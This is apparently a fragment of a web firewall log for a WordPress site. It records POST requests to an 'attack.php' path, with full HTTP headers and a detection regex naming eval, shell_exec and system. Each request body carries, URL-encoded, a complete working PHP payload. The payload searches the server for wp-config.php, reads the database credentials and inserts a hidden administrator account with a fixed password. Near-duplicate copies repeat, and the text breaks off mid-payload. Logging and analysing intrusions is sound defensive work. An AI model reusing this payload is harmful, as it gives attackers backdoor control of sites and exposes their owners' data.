Safari\/537.36\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\n\nRU=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:15:43","213.209.159.254","POST","\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Sd:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12640\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\ncookie:4=36a4c8b62b7aabfcdffca1c8db607abc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvH2DvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOip3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\n\nSd=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix